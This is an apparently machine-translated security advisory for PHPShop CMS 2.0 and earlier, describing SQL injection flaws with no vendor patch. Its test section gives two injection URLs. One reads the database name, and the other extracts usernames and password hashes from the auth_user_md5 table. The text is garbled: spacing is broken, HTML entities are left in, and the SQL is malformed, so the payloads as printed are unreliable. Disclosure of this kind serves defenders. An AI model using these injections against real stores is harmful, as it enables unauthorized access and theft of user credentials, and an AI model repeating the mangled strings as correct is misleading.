Release date:
Updated on: 2013-01-20
Affected Systems:
PhpShop
Description:
--------------------------------------------------------------------------------
Bugtraq id: 57320
PhpShop is a WEB-based e-commerce program.
PHPShop CMS 2.0 and earlier versions have security vulnerabilities that allow attackers to control applications, access or modify data, and perform unauthorized operations.
<* Source: onestree
*>
Test method:
--------------------------------------------------------------------------------
Alert
The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!
Http://www.example.com/phpshop 2.0 /? Page = admin/function_list & amp; module_id = 11 'Union select 1, database --
Http://www.example.com/phpshop 2.0 /? Page = shop/flypage & amp; product_id = 1087 '/**/union/**/select/**/, 1, password,, 1, username/**/from/**/auth_user_md5 --
Suggestion:
--------------------------------------------------------------------------------
Vendor patch:
PhpShop
-------
Currently, the vendor does not provide patches or upgrade programs. We recommend that users who use the software follow the vendor's homepage to obtain the latest version:
Http://www.phpshop.org/